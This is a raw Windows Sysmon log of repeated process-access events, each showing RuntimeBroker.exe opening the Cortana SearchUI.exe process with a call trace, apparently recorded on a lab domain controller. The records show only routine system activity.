12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
